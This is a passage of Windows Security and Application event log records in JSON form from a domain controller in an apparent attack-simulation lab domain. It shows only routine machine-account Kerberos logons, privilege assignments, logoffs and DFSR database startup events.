{"EventTime":"2020-08-01 06:54:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220405,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6537B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6537b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220406,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6537B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52625\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6537b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52625","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220407,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6537B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6537b","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":102,"SourceName":"ESENT","Task":1,"RecordNumber":12128,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2916) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine (10.00.14393.0000) is starting a new instance (0).","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":105,"SourceName":"ESENT","Task":1,"RecordNumber":12129,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2916) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine started a new instance (0). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.016, [4] 0.031, [5] 0.000, [6] 0.000, [7] 0.015, [8] 0.000, [9] 0.000, [10] 0.000.","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":326,"SourceName":"ESENT","Task":1,"RecordNumber":12130,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2916) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine attached a database (1, \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.016, [4] 0.000, [5] 0.000, [6] 0.000, [7] 0.000, [8] 0.000, [9] 0.000, [10] 0.000, [11] 0.000, [12] 0.000. \r\nSaved Cache: 0 0","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220408,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x653D1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x653d1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220409,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x653D1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52627\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x653d1","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52627","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220410,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65423\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65423","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220411,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65423\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52629\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65423","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52629","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220412,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6545E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6545e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220413,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6545E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52629\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6545e","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52629","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220414,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65497\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65497","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220415,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65497\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52630\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some 